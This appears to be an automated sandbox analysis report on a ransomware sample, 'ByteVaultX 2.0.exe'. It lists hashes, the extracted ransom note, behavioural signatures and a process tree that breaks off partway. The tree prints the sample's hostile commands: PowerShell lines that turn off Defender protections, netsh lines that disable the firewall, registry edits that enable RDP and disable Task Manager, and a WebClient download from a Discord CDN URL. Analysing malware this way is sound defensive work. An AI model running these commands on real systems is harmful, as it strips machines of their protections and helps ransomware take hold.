Analysis

  • max time kernel
    970s
  • max time network
    975s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240508-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    25/05/2024, 23:42

General

  • Target

    ByteVaultX 2.0.exe

  • Size

    9.9MB

  • MD5

    d4c033244c9bf694cf7063f136b01e30

  • SHA1

    a460178565327d0a0b756d165ff0fa3aae5f7abe

  • SHA256

    1a21a8954832306df2f9ff1b2296fbee0a079b019d3ef511ef6ec278fa9084e5

  • SHA512

    78f267f14fa35e975237c877e3de5e5e918c7f80c622ba255429f5a92572aa84a49b233f0ef36d6c65409c3297bbe14a528608cc6a843d8dc14eec7a0b27d75d

  • SSDEEP

    196608:4h7iRIk7AHkPkRJW9GNZA1HeT39Iig6eE9TFa0Z8DOjCdylNo1nz8QW7tx:hGFG8S1+TtIi+Y9Z8D8CclydoPx

Malware Config

Extracted

  • Language

    ps1

  • Deobfuscated URLs

    exe.dropper: https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&

Extracted

  • Path

    C:\Encrypt\encrypt.html

  • Ransom Note

    Your Files Have Been Encrypted Your Files Have Been Encrypted By The ByteVaultX Test-Ransomware The price for the Decryption is $0 in Bitcoin (BTC). Follow these steps to get your decryption: You Do It. But Remember this malware is Just For VMS This is a Test Ransomware Your Files Have Been Encrypted By The ByteVaultX Test-Ransomware Ask AI How to Use the Ransomware key with the decryption algorithm (in this case, the Fernet decryption algorithm) to decrypt each encrypted file. Save the decrypted data to new files or overwrite the original encrypted files if desired. You Will Also Have To install Python and cryptography Please note that the dercyption key is in the path C:\encrypt\Key.txt and please note you have infinite time For support, you can ask ai how to encrypt your data Trustet AI

Signatures

  • Renames multiple (142) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Blocklisted process makes network request (4 IoCs)
  • Disables Task Manager via registry modification
  • Modifies Windows Firewall (2 TTPs, 36 IoCs)
  • Checks computer location settings (2 TTPs, 1 IoC)

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL (12 IoCs)
  • Drops desktop.ini file(s) (8 IoCs)
  • Command and Scripting Interpreter: PowerShell (1 TTP, 60 IoCs)

    Using powershell.exe command.

  • Sets desktop wallpaper using registry (2 TTPs, 4 IoCs)
  • Enumerates physical storage devices (1 TTP)

    Attempts to interact with connected storage/optical drive(s).

  • Enumerates system info in registry (2 TTPs, 3 IoCs)
  • Modifies registry class (4 IoCs)
  • Suspicious behavior: EnumeratesProcesses (64 IoCs)
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary (6 IoCs)
  • Suspicious use of AdjustPrivilegeToken (60 IoCs)
  • Suspicious use of FindShellTrayWindow (35 IoCs)
  • Suspicious use of SendNotifyMessage (34 IoCs)
  • Suspicious use of WriteProcessMemory (64 IoCs)

Processes

  • C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe
    "C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2928
    • C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe
      "C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe"
      2⤵
      • Checks computer location settings
      • Loads dropped DLL
      • Drops desktop.ini file(s)
      • Suspicious use of WriteProcessMemory
      PID:2408
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1680
      • C:\Windows\SYSTEM32\netsh.exe
        netsh advfirewall set allprofiles state off
        3⤵
        • Modifies Windows Firewall
        PID:5572
      • C:\Windows\SYSTEM32\runas.exe
        runas /user:NT-AUTORITÄT\SYSTEM cmd.exe /c "C:\Encrypt\encrypt.bat"
        3⤵
          PID:1596
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Encrypt\encrypt.html
          3⤵
          • Enumerates system info in registry
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          • Suspicious use of WriteProcessMemory
          PID:4068
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffa121846f8,0x7ffa12184708,0x7ffa12184718
            4⤵
              PID:6112
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,5292310798493132192,16021345772022231361,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2152 /prefetch:2
              4⤵
                PID:3096
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2148,5292310798493132192,16021345772022231361,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 /prefetch:3
                4⤵
                • Suspicious behavior: EnumeratesProcesses
                PID:4416
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2148,5292310798493132192,16021345772022231361,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2868 /prefetch:8
                4⤵
                  PID:2384
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,5292310798493132192,16021345772022231361,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3292 /prefetch:1
                  4⤵
                    PID:1804
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,5292310798493132192,16021345772022231361,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:1
                    4⤵
                      PID:2484
                    • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2148,5292310798493132192,16021345772022231361,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5208 /prefetch:8
                      4⤵
                        PID:3636
                      • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2148,5292310798493132192,16021345772022231361,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5208 /prefetch:8
                        4⤵
                        • Suspicious behavior: EnumeratesProcesses
                        PID:1596
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,5292310798493132192,16021345772022231361,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4756 /prefetch:1
                        4⤵
                          PID:1868
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,5292310798493132192,16021345772022231361,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4736 /prefetch:1
                          4⤵
                            PID:3056
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,5292310798493132192,16021345772022231361,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5036 /prefetch:1
                            4⤵
                              PID:4140
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,5292310798493132192,16021345772022231361,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5292 /prefetch:1
                              4⤵
                                PID:4136
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,5292310798493132192,16021345772022231361,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1364 /prefetch:2
                                4⤵
                                  PID:3492
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c ""C:\Encrypt\encrypt.bat" "
                                3⤵
                                • Suspicious use of WriteProcessMemory
                                PID:5456
                                • C:\Windows\system32\reg.exe
                                  reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
                                  4⤵
                                    PID:4380
                                  • C:\Windows\system32\reg.exe
                                    reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
                                    4⤵
                                      PID:5580
                                    • C:\Windows\system32\reg.exe
                                      reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
                                      4⤵
                                        PID:840
                                      • C:\Windows\system32\reg.exe
                                        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
                                        4⤵
                                          PID:1004
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
                                          4⤵
                                          • Command and Scripting Interpreter: PowerShell
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:564
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
                                          4⤵
                                          • Command and Scripting Interpreter: PowerShell
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:3212
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          powershell -Command "Set-MpPreference -DisableScriptScanning $true"
                                          4⤵
                                          • Command and Scripting Interpreter: PowerShell
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:5260
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          powershell -Command "Set-MpPreference -DisableEmailProtection $true"
                                          4⤵
                                          • Command and Scripting Interpreter: PowerShell
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:3336
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
                                          4⤵
                                          • Command and Scripting Interpreter: PowerShell
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:5776
                                        • C:\Windows\system32\netsh.exe
                                          netsh firewall set opmode disable
                                          4⤵
                                          • Modifies Windows Firewall
                                          PID:844
                                        • C:\Windows\system32\netsh.exe
                                          netsh firewall set opmode mode=DISABLE
                                          4⤵
                                          • Modifies Windows Firewall
                                          PID:4732
                                        • C:\Windows\system32\netsh.exe
                                          netsh advfirewall set currentprofile state off
                                          4⤵
                                          • Modifies Windows Firewall
                                          PID:2520
                                        • C:\Windows\system32\netsh.exe
                                          netsh advfirewall set domainprofile state off
                                          4⤵
                                          • Modifies Windows Firewall
                                          PID:5548
                                        • C:\Windows\system32\netsh.exe
                                          netsh advfirewall set privateprofile state off
                                          4⤵
                                          • Modifies Windows Firewall
                                          PID:5424
                                        • C:\Windows\system32\netsh.exe
                                          netsh advfirewall set publicprofile state off
                                          4⤵
                                          • Modifies Windows Firewall
                                          PID:5000
                                        • C:\Windows\system32\netsh.exe
                                          netsh advfirewall set allprofiles state off
                                          4⤵
                                          • Modifies Windows Firewall
                                          PID:5044
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
                                          4⤵
                                          • Command and Scripting Interpreter: PowerShell
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:4780
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
                                          4⤵
                                          • Command and Scripting Interpreter: PowerShell
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:776
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
                                          4⤵
                                          • Command and Scripting Interpreter: PowerShell
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:5960
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          powershell -Command "Set-MpPreference -DisableScriptScanning $true"
                                          4⤵
                                          • Command and Scripting Interpreter: PowerShell
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:5492
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          powershell -Command "Set-MpPreference -DisableEmailProtection $true"
                                          4⤵
                                          • Command and Scripting Interpreter: PowerShell
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:2224
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
                                          4⤵
                                          • Command and Scripting Interpreter: PowerShell
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:4584
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"
                                          4⤵
                                          • Blocklisted process makes network request
                                          • Command and Scripting Interpreter: PowerShell
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:2852
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"
                                          4⤵
                                          • Command and Scripting Interpreter: PowerShell
                                          • Modifies registry class
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:5212
                                          • C:\Windows\System32\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"
                                            5⤵
                                              PID:3584
                                              • C:\Windows\system32\reg.exe
                                                reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
                                                6⤵
                                                  PID:1152
                                                • C:\Windows\system32\reg.exe
                                                  reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
                                                  6⤵
                                                    PID:5560
                                                  • C:\Windows\system32\reg.exe
                                                    reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
                                                    6⤵
                                                      PID:5768
                                                    • C:\Windows\system32\reg.exe
                                                      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
                                                      6⤵
                                                        PID:184
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
                                                        6⤵
                                                        • Command and Scripting Interpreter: PowerShell
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:1120
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
                                                        6⤵
                                                        • Command and Scripting Interpreter: PowerShell
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:4684
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -Command "Set-MpPreference -DisableScriptScanning $true"
                                                        6⤵
                                                        • Command and Scripting Interpreter: PowerShell
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:3080
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -Command "Set-MpPreference -DisableEmailProtection $true"
                                                        6⤵
                                                        • Command and Scripting Interpreter: PowerShell
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:6044
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
                                                        6⤵
                                                        • Command and Scripting Interpreter: PowerShell
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:2412
                                                      • C:\Windows\system32\netsh.exe
                                                        netsh firewall set opmode disable
                                                        6⤵
                                                        • Modifies Windows Firewall
                                                        PID:5684
                                                      • C:\Windows\system32\netsh.exe
                                                        netsh firewall set opmode mode=DISABLE
                                                        6⤵
                                                        • Modifies Windows Firewall
                                                        PID:5664
                                                      • C:\Windows\system32\netsh.exe
                                                        netsh advfirewall set currentprofile state off
                                                        6⤵
                                                        • Modifies Windows Firewall
                                                        PID:5008
                                                      • C:\Windows\system32\netsh.exe
                                                        netsh advfirewall set domainprofile state off
                                                        6⤵
                                                        • Modifies Windows Firewall
                                                        PID:5480
                                                      • C:\Windows\system32\netsh.exe
                                                        netsh advfirewall set privateprofile state off
                                                        6⤵
                                                        • Modifies Windows Firewall
                                                        PID:2852
                                                      • C:\Windows\system32\netsh.exe
                                                        netsh advfirewall set publicprofile state off
                                                        6⤵
                                                        • Modifies Windows Firewall
                                                        PID:1200
                                                      • C:\Windows\system32\netsh.exe
                                                        netsh advfirewall set allprofiles state off
                                                        6⤵
                                                        • Modifies Windows Firewall
                                                        PID:5392
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
                                                        6⤵
                                                        • Command and Scripting Interpreter: PowerShell
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:3692
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
                                                        6⤵
                                                        • Command and Scripting Interpreter: PowerShell
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:816
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
                                                        6⤵
                                                        • Command and Scripting Interpreter: PowerShell
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:4240
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -Command "Set-MpPreference -DisableScriptScanning $true"
                                                        6⤵
                                                        • Command and Scripting Interpreter: PowerShell
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:5292
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -Command "Set-MpPreference -DisableEmailProtection $true"
                                                        6⤵
                                                        • Command and Scripting Interpreter: PowerShell
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:6008
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
                                                        6⤵
                                                        • Command and Scripting Interpreter: PowerShell
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:5492
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"
                                                        6⤵
                                                        • Blocklisted process makes network request
                                                        • Command and Scripting Interpreter: PowerShell
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:5536
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"
                                                        6⤵
                                                        • Command and Scripting Interpreter: PowerShell
                                                        • Modifies registry class
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:1804
                                                        • C:\Windows\System32\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"
                                                          7⤵
                                                            PID:4788
                                                            • C:\Windows\system32\reg.exe
                                                              reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
                                                              8⤵
                                                                PID:1064
                                                              • C:\Windows\system32\reg.exe
                                                                reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
                                                                8⤵
                                                                  PID:1200
                                                                • C:\Windows\system32\reg.exe
                                                                  reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
                                                                  8⤵
                                                                    PID:5284
                                                                  • C:\Windows\system32\reg.exe
                                                                    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
                                                                    8⤵
                                                                      PID:1768
                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
                                                                      8⤵
                                                                      • Command and Scripting Interpreter: PowerShell
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:3168
                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
                                                                      8⤵
                                                                      • Command and Scripting Interpreter: PowerShell
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:184
                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -Command "Set-MpPreference -DisableScriptScanning $true"
                                                                      8⤵
                                                                      • Command and Scripting Interpreter: PowerShell
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:1800
                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -Command "Set-MpPreference -DisableEmailProtection $true"
                                                                      8⤵
                                                                      • Command and Scripting Interpreter: PowerShell
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:4240
                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
                                                                      8⤵
                                                                      • Command and Scripting Interpreter: PowerShell
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:2396
                                                                    • C:\Windows\system32\netsh.exe
                                                                      netsh firewall set opmode disable
                                                                      8⤵
                                                                      • Modifies Windows Firewall
                                                                      PID:3748
                                                                    • C:\Windows\system32\netsh.exe
                                                                      netsh firewall set opmode mode=DISABLE
                                                                      8⤵
                                                                      • Modifies Windows Firewall
                                                                      PID:3604
                                                                    • C:\Windows\system32\netsh.exe
                                                                      netsh advfirewall set currentprofile state off
                                                                      8⤵
                                                                      • Modifies Windows Firewall
                                                                      PID:1608
                                                                    • C:\Windows\system32\netsh.exe
                                                                      netsh advfirewall set domainprofile state off
                                                                      8⤵
                                                                      • Modifies Windows Firewall
                                                                      PID:840
                                                                    • C:\Windows\system32\netsh.exe
                                                                      netsh advfirewall set privateprofile state off
                                                                      8⤵
                                                                      • Modifies Windows Firewall
                                                                      PID:1012
                                                                    • C:\Windows\system32\netsh.exe
                                                                      netsh advfirewall set publicprofile state off
                                                                      8⤵
                                                                      • Modifies Windows Firewall
                                                                      PID:3800
                                                                    • C:\Windows\system32\netsh.exe
                                                                      netsh advfirewall set allprofiles state off
                                                                      8⤵
                                                                      • Modifies Windows Firewall
                                                                      PID:4824
                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
                                                                      8⤵
                                                                      • Command and Scripting Interpreter: PowerShell
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:4592
                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
                                                                      8⤵
                                                                      • Command and Scripting Interpreter: PowerShell
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:2096
                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
                                                                      8⤵
                                                                      • Command and Scripting Interpreter: PowerShell
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:4304
                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -Command "Set-MpPreference -DisableScriptScanning $true"
                                                                      8⤵
                                                                      • Command and Scripting Interpreter: PowerShell
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:2740
                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -Command "Set-MpPreference -DisableEmailProtection $true"
                                                                      8⤵
                                                                      • Command and Scripting Interpreter: PowerShell
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:3492
                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
                                                                      8⤵
                                                                      • Command and Scripting Interpreter: PowerShell
